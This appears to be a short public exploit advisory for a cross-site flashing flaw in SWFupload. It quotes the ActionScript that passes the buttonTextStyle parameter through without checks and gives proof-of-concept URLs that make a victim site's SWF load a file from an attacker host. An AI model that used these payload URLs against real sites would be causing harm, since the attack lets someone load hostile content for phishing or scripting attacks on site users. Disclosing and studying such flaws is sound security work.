54 lines
No EOL
1.4 KiB
Text
54 lines
No EOL
1.4 KiB
Text
# Exploit Title: SWFupload All Version XSF Vulnerability
|
|
|
|
# Date: 25/01/2014
|
|
|
|
# Exploit Author: MindCracker - Team MaDLeeTs
|
|
|
|
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
|
|
|
|
# Verion : All
|
|
|
|
# Tested on: Linux / Window
|
|
|
|
#Description :
|
|
|
|
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
|
|
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting
|
|
|
|
#Vulnerable Code :
|
|
|
|
|
|
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
|
|
|
|
this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
|
|
}
|
|
catch(ex:Object)
|
|
{
|
|
this.SetButtonTextStyle("");
|
|
}
|
|
try
|
|
{
|
|
|
|
As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
|
|
The vulneralbe SWF will load any file
|
|
|
|
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
|
|
|
|
2.
|
|
|
|
ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
|
|
SetButtonText
|
|
|
|
{
|
|
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
|
|
}
|
|
catch(ex:Object)
|
|
{
|
|
this.SetButtonText("");
|
|
}
|
|
try
|
|
{
|
|
|
|
#POC
|
|
|
|
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf |